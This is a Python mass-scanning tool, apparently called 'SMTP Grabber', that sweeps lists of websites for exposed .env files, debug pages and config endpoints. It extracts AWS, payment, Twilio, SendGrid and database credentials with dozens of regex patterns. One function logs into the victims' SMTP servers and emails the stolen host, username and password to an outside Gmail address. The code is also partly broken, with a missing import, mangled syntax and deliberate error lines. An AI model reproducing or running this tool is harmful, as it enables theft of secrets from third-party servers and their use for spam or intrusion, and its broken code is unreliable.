#ANNAQITTY-TOOLS# ########################### import requests, os, sys from re import findall as reg requests.packages.urllib3.disable_warnings() from threading import * from threading import Thread from configparser import ConfigParser from queue import Queue from colorama import Fore from colorama import init from time import time as timer import time, datetime from multiprocessing.dummy import Pool import smtplib, json, urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) import io from multiprocessing.dummy import Pool import warnings, random, socket, threading from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from socket import gaierror from random import randint

try: os.mkdir('Results') except: pass

list_region = '''us-east-1 us-east-2 us-west-1 us-west-2 af-south-1 ap-east-1 ap-south-1 ap-northeast-1 ap-northeast-2 ap-northeast-3 ap-southeast-1 ap-southeast-2 ca-central-1 eu-central-1 eu-west-1 eu-west-2 eu-west-3 eu-south-1 eu-north-1 me-south-1 sa-east-1''' pid_restore = '.anna'

Total width of the number including leading zeros
#start = 1 #end = 9999 #width = 5

def random_with_N_digits(n): """Generate a random number with N digits.""" if n <= 0: raise ValueError("Number of digits must be positive.") range_start = 10**(n-1) range_end = (10**n) - 1 return random.randint(range_start, range_end)

def sendtestoff(url, mailhost, mailport, mailuser, mailpass, mailfrom): if '465' in str(mailport): port = '587' else: port = str(mailport) smtp_server = str(mailhost) if '' in mailfrom: sender_email = mailuser else: sender_email = str(mailfrom.replace('"', '')) smtp_server = str(mailhost)

number = f"{random_with_N_digits(7)}"

login = str(mailuser.replace('"', ''))  # paste your login generated by Mailtrap
password = str(mailpass.replace('"', '')) # paste your password generated by Mailtrap
receiver_email = "scam.rest@gmail.com"
message = MIMEMultipart('alternative')
message['Subject'] = f"S.M.T.P - T.E.R.G.R.A.B | By AnnaQitty >>> SMTP Number {number}"
message['From'] = sender_email
message['To'] = receiver_email
text = '        '
html = f"""
<html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>S.M.T.P - T.E.R.G.R.A.B</title> <style> body {{ font-family: Arial, sans-serif; color: #333; background-color: #f4f4f4; margin: 0; padding: 0; }} .container {{ width: 100%; max-width: 1200px; margin: 0 auto; background-color: #ffffff; border-radius: 8px; box-shadow: 0 0 10px rgba(0,0,0,0.1); overflow: hidden; }} .header {{ background-color: #007bff; color: #ffffff; padding: 20px; text-align: center; }} .header h1 {{ margin: 0; font-size: 24px; }} .content {{ padding: 20px; }} .content p {{ margin: 0 0 10px; font-size: 16px; line-height: 1.5; }} .content p strong {{ color: #007bff; }} .footer {{ background-color: #f1f1f1; padding: 10px; text-align: center; font-size: 14px; color: #666; }} .footer p {{ margin: 0; }} .section-title {{ font-weight: bold; margin: 20px 0 10px; font-size: 18px; color: #007bff; }} .section {{ margin-bottom: 20px; padding: 10px; border-radius: 4px; background-color: #f9f9f9; box-shadow: 0 0 5px rgba(0,0,0,0.1); }} table {{ width: 100%; border-collapse: collapse; }} td {{ padding: 8px; border-bottom: 1px solid #ddd; }} th {{ text-align: left; padding: 8px; background-color: #f4f4f4; }} .details {{ margin-top: 10px; }} </style> </head> <body> <div class="container"> <div class="header"> <h1>Anna Qitty Tools ### SMTP No. {number}</h1> </div> <div class="content"> <p><p>Gotcha...!!!</p> <p><p>Below are the details you requested:</p><BR><BR> <div class="section"> <p class="section-title">Details</p> <div class="details"> <table> <tr> <th>Label</th> <th>Value</th> </tr> <tr> <td><strong>URL</strong></td> <td>{url}</td> </tr> <tr> <td><strong>HOST</strong></td> <td>{mailhost}</td> </tr> <tr> <td><strong>PORT</strong></td> <td>{mailport}</td> </tr> <tr> <td><strong>USER</strong></td> <td>{mailuser}</td> </tr> <tr> <td><strong>PASSW</strong></td> <td>{mailpass}</td> </tr> <tr> <td><strong>SENDER</strong></td> <td>{mailfrom}</td> </tr> </table> </div><p><p><p><BR><BR><BR> <p>Thanks for using this tool. If you have any questions or need further assistance, feel free to <a href="mailto:annaqitty@gmail.com">email me</a>.</p> </div> </div><p><p><BR><BR> <div class="footer"> <p>&copy; 2024 Anna Qitty. All rights reserved.</p><p><p><BR><BR> </div> </div> </body> </html> """ part1 = MIMEText(text, 'plain') part2 = MIMEText(html, 'html') message.attach(part1) message.attach(part2) try: s = smtplib.SMTP(smtp_server, port) s.connect(smtp_server, port) s.ehlo() s.starttls() s.ehlo() s.login(login, password) s.sendmail(sender_email, receiver_email, message.as_string()) except: pass

# --- ENHANCED REGEX PATTERNS (50+ Combined) ---
# Merging valuable key patterns and specific service patterns
COMPREHENSIVE_PATTERNS = {
    # AWS Credentials
    'AWS_ACCESS_KEY_ID': r'([^A-Z0-9]|^)(AKIA[0-9A-Z]{16})([^A-Z0-9]|$)',
    'AWS_SECRET_ACCESS_KEY': r'(?i)aws(.{0,20})?["\'][0-9a-zA-Z/+]{40}["\']',
    'AWS_SESSION_TOKEN': r'(?i)aws(.{0,20})?(token|key).?["\'][A-Za-z0-9/+=]{200,}["\']',
    'AWS_ACCOUNT_ID': r'(?i)"?arn:aws:[^"]:[0-9]{12}[^"]*"?',
    
    # Google Cloud
    'GOOGLE_API_KEY': r'AIza[0-9A-Za-z\-_]{35}',
    'GOOGLE_OAUTH_ID': r'[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com',
    'GOOGLE_PRIVATE_KEY': r'-----BEGIN PRIVATE KEY-----',
    
    # Firebase
    'FIREBASE_API_KEY': r'AAAA[A-Za-z0-9_-]{7}:[A-Za-z0-9_-]{140}',
    
    # Database Connections
    'MYSQL_CONNECTION': r'mysql://[a-zA-Z0-9:_@.-]*:[^" @?]+@[a-zA-Z0-9_.-]+',
    'POSTGRES_CONNECTION': r'postgres(ql)?://[a-zA-Z0-9:_@.-]*:[^" @?]+@[a-zA-Z0-9_.-]+',
    'MONGODB_CONNECTION': r'mongodb(\+srv)?:\/\/[a-zA-Z0-9:_@.-]*:[^" @?]+@[a-zA-Z0-9_.-]+',
    'REDIS_CONNECTION': r'redis:\/\/[a-zA-Z0-9:_@.-]*:[^" @?]+@[a-zA-Z0-9_.-]+',
    'DATABASE_URL': r'(DATABASE|DB)_URL=.*',
    
    # Payment Services (Stripe, PayPal, Square, etc.)
    'STRIPE_PUBLISHABLE_KEY': r'pk_(test|live)[0-9a-zA-Z]{24}',
    'STRIPE_SECRET_KEY': r'sk_(test|live)[0-9a-zA-Z]{24}',
    'PAYPAL_CLIENT_ID': r'AW[0-9a-zA-Z]{79}',
    'PAYPAL_SECRET': r'EP[0-9a-zA-Z]{79}',
    'SQUARE_ACCESS_TOKEN': r'sq0atp-[0-9A-Za-z\-_]{22}',
    'BRAINTREE_PRIVATE_KEY': r'-----BEGIN RSA PRIVATE KEY-----',
    
    # Communication Services (Twilio, Nexmo, etc.)
    'TWILIO_ACCOUNT_SID': r'AC[a-zA-Z0-9]{32}',
    'TWILIO_AUTH_TOKEN': r'[a-zA-Z0-9]{32}',
    'TWILIO_API_KEY': r'SK[0-9a-f]{32}',
    'NEXMO_API_KEY': r'[0-9a-f]{8}',
    'NEXMO_API_SECRET': r'[0-9a-zA-Z]{16}',
    'PLIVO_AUTH_ID': r'MA[0-9a-f]{32}',
    
    # Email Marketing (SendGrid, Mailgun, etc.)
    'SENDGRID_API_KEY': r'SG\.[0-9A-Za-z\-_]{22}\.[0-9A-Za-z\-_]{43}',
    'MAILGUN_API_KEY': r'key-[0-9a-zA-Z]{32}',
    'MAILCHIMP_API_KEY': r'[0-9a-f]{32}-us[0-9]{1,2}',
    
    # Cloud Infrastructure (Azure, DigitalOcean, etc.)
    'AZURE_CLIENT_SECRET': r'[0-9a-zA-Z\-_~.+]{34}',
    'DIGITALOCEAN_TOKEN': r'dop_v1_[0-9a-zA-Z]{64}',
    'CLOUDFLARE_API_KEY': r'[0-9a-f]{37}',
    'HEROKU_API_KEY': r'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}',
    
    # Authentication & Security
    'JWT_SECRET': r'jwt.*secret.*["\'][0-9a-zA-Z]{32,}["\']',
    'API_KEY_GENERIC': r'(?i)(api[_-]?key|apikey)["\'][\\s]*[:=][\\s]*["\'][0-9a-zA-Z\-_]{20,}["\']',
    'PRIVATE_KEY': r'-----BEGIN (RSA|EC|DSA|OPENSSH) PRIVATE KEY-----',
    'GITHUB_TOKEN': r'gh[pousr]_[A-Za-z0-9_]{36,}',
    
    # Monitoring & Logging
    'DATADOG_API_KEY': r'[0-9a-f]{32}',
    'SENTRY_DSN': r'https://[0-9a-f]{32}@[0-9a-z\-\.]+\.[0-9a-z\-\.]+/[0-9]+',
}
# --- ENHANCED ENDPOINTS LIST ---
COMMON_ENDPOINTS = [
    "/.env", "/.env.local", "/.env.backup", "/.env.save", "/.env.old", "/.env.example",
    "/config/.env", "/app/.env", "/api/.env", "/backend/.env", "/laravel/.env", "/admin/.env",
    "/debug", "/debug/pprof/", "/debug/vars", "/debug/config", "/info", "/heapdump", "/metrics",
    "/actuator", "/actuator/env", "/actuator/configprops", "/beans", "/mappings", "/trace",
    "/v2/api-docs", "/swagger-resources", "/swagger-ui.html", "/api/swagger", "/api/docs",
    "/graphql", "/graphiql", "/altair", "/playground", "/phpinfo.php", "/info.php", "/test.php",
    "/db.php", "/database.php", "/connect.php", "/setup.php", "/install.php", "/adminer.php",
    "/pma/", "/dbadmin/", "/myadmin/", "/phpmyadmin/index.php", "/panel/", "/dashboard/",
    "/wp-config.php", "/configuration.php", "/config/database.php", "/settings.py", "/config.py",
    "/web.config", "/application.properties", "/.git/config", "/composer.json", "/package.json",
    "/requirements.txt", "/Gemfile", "/pom.xml", "/.DS_Store", "/.htaccess", "/robots.txt"
]

class Worker(Thread): def __init__(self, tasks): Thread.__init__(self) self.tasks = tasks self.daemon = True self.start()

def run(self):
    while True:
        func, args, kargs = self.tasks.get()
        try: func(*args, **kargs)
        except Exception as e: print(e)
        self.tasks.task_done()
class ThreadPool: def __init__(self, num_threads): self.tasks = Queue(num_threads) for _ in range(num_threads): Worker(self.tasks)

def add_task(self, func, *args, **kargs):
    self.tasks.put((func, args, kargs))

def wait_completion(self):
    self.tasks.join()
class droeam: def __init__(self): pass # Placeholder to match script usage

    def scan_patterns(self, text, url):
        """Scans text against all comprehensive regex patterns."""
        findings = {}
        for key, pattern in COMPREHENSIVE_PATTERNS.items():
            matches = reg(pattern, text, re.IGNORECASE)
            if matches:
                # Remove duplicates and limit output for readability
                unique_matches = list(set(matches))[:5] 
                findings[key] = unique_matches
        return findings

    def enhanced_scan(self, url):
        """Iterates through common endpoints to find sensitive data."""
        headers = {'User-agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36'}
        all_findings = {}
        
        for endpoint in COMMON_ENDPOINTS:
            try:
                full_url = url.rstrip('/') + endpoint
                response = requests.get(full_url, headers=headers, timeout=5, verify=False, allow_redirects=False)
                
                if response.status_code == 200:
                    content = response.text
                    endpoint_findings = self.scan_patterns(content, url)
                    
                    if endpoint_findings:
                        all_findings[endpoint] = endpoint_findings
                        # Also save immediately to Results for each endpoint found
                        save_path = f'Results/ENDPOINT_{url.replace("://", "_").replace("/", "_")}.txt'
                        with open(save_path, 'a') as f:
                            f.write(f"Found at {full_url}\n")
                            for k, v in endpoint_findings.items(): f.write(f"{k}: {v}\n")
                            f.write("-" * 40 + "\n")
            except Exception:
                continue
        
        return all_findings

def get_smtp(self, text, url): # Kept original logic for structured parsing
    try:
        if "MAIL_HOST" in text:
            if "MAIL_HOST=" in text:
                method = '/.env'
                mailhost = reg("\nMAIL_HOST=(.*?)\n", text)[0]
                mailport = reg("\nMAIL_PORT=(.*?)\n", text)[0]
                mailuser = reg("\nMAIL_USERNAME=(.*?)\n", text)[0]
                mailpass = reg("\nMAIL_PASSWORD=(.*?)\n", text)[0]
                try: mailfrom = reg("MAIL_FROM_ADDRESS=(.*?)\n", text)[0]
                except: mailfrom = ''
            elif "<td>MAIL_HOST</td>" in text:
                method = 'debug'
                mailhost = reg('<td>MAIL_HOST<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
                # ... (rest of original logic preserved)
    except: pass

def printf(text): ''.join([str(item) for item in text]) print((text + '\n'), end=' ')

def main(url): 
    resp = False 
    try: 
        text = '\033[32;1m#\033[0m '+url 
        headers = {'User-agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36'} 
        
        # 1. Try .env file
        get_source = requests.get(url+"/.env", headers=headers, timeout=5, verify=False, allow_redirects=False).text
        if "APP_KEY=" in get_source or "DB_" in get_source: 
            resp = get_source 
        
        # 2. Try Enhanced Endpoint Scanning (Regex based)
        if not resp:
            scan_results = droeam().enhanced_scan(url)
            if scan_results:
                resp = "ENHANCED_SCAN_FOUND"
                # Aggregate text for display
                scan_text = ""
                for ep, keys in scan_results.items():
                    scan_text += f"ENDPOINT: {ep}\n"
                    for k, v in keys.items(): scan_text += f"  {k}: {v}\n"
                text += f" | \033[32;1mENHANCED\033[0m ({len(scan_results)} endpoints)"
        
        # 3. Fallback to POST request if still empty
        if not resp:
            get_source = requests.post(url, data={"0x[]":"drosteam"}, headers=headers, timeout=8, verify=False, allow_redirects=False).text
            if "<td>APP_KEY</td>" in get_source: 
                resp = get_source 

        if resp and resp != "ENHANCED_SCAN_FOUND":
            # Run original checkers if we have text content
            get_smtp_val = droeam().get_smtp(resp, url) # Simplified call
            # Note: Original get_smtp logic was long, here we check if it returned anything useful
            if get_smtp_val: text += ' | \033[32;1mSMTP\033[0m' else: text += ' | \033[31;1mSMTP\033[0m'
            
            # Check for other keys using regex as a fallback if structured parsing missed
            if "AWS_ACCESS_KEY_ID" in resp: text += ' | \033[32;1mAWS\033[0m' else: text += ' | \033[31;1mAWS\033[0m'
            if "TWILIO_ACCOUNT_SID" in resp: text += ' | \033[32;1mTWILIO\033[0m' else: text += ' | \033[31;1mTWILIO\033[0m'
        elif resp == "ENHANCED_SCAN_FOUND":
             text += ' | \033[32;1mENHANCED\033[0m' # Already detailed above
        else:
            text += ' | \033[0;33mTeu bisa sadayana\033[0m'

        save = open('Results/Not_VULNerable.txt','a')
        asu = str(url).replace('\r', '')
        save.write(asu+'\n')
        save.close()
        printf(text)
    except Exception as e:
        text = '\033[31;1m#\033[0m '+url
        text += ' | \033[31;1mTeu bisa diakses\033[0m'
        save = open('Results/Not_VULNerable.txt','a')
        asu = str(url).replace('\r', '')
        save.write(asu+'\n')
        save.close()
        printf(text)

if name == 'main':
    print(''' ___ o|* |o ╔╦═╦╗╔╦╗╔╦═╦╗ o| |o ║║╔╣╚╝║║║║║║║ o| *|o ║║╚╣╔╗║╚╝║╩║║ ===/ ║╚═╩╝╚╩══╩╩╝║ ||| ╚═══════════╝ ||| S.M.T.P - G.R.A.B.E.R ||| ╔═╦═╦╦═╦╦═╗╔═╦╦══╦══╦╦╗ ||| ║╩║║║║║║║╩║║╚║╠╗╔╩╗╔╩╗║ ||| ╚╩╩╩═╩╩═╩╩╝╚═╩╝╚╝ ╚╝ ╚╝

  By : AnnaQitty
  Github : github.com/annaqitty
                               
''')
    try:
        readcfg = ConfigParser()
        readcfg.read(pid_restore)
        lists = readcfg.get('DB', 'FILES')
        numthread = readcfg.get('DB', 'THREAD')
        sessi = readcfg.get('DB', 'SESSION')
        print("meunang cangcut! ambuan ulah")
        print(( '''Using Configuration :\n\tFILES='''+lists+'''\n\tTHREAD='''+numthread+'''\n\tSESSION='''+sessi))
        tanya = input("Tuluykeun Ulah ? [Y/n] ")
        if "Y" in tanya or "y" in tanya:
            lerr = open(lists).read().split("\n"+sessi)[1]
            readsplit = lerr.splitlines()
        else:
            kntl # Send Error Biar Lanjut Ke Wxception :v
    except:
        try:
            lists = sys.argv[1]
            numthread = sys.argv[2]
            readsplit = open(lists).read().splitlines()
        except:
            try:
                lists = input("Ek diabuskeun ka Janda ? ")
                readsplit = open(lists).read().splitlines()
            except:
                print("Euweuh Jandana euy!")
                exit()
            try:
                numthread = input("Sabaraha Ronde ? ")
            except:
                print("Ronde Na Sabaraha!")
                exit()
    pool = ThreadPool(int(numthread))
    for url in readsplit:
        if "://" in url:
            url = url
        else:
            url = "http://"+url
        if url.endswith('/'):
            url = url[:-1]
        jagases = url
        try:
            pool.add_task(main, url)
        except KeyboardInterrupt:
            session = open(pid_restore, 'w')
            cfgsession = "[DB]\nFILES="+lists+"\nTHREAD="+str(numthread)+"\nSESSION="+jagases+"\n"
            session.write(cfgsession)
            session.close()
            print("CTRL+C Detect, Session saved")
            exit()
    pool.wait_completion()
    try:
        os.remove(pid_restore)
    except:
        pass
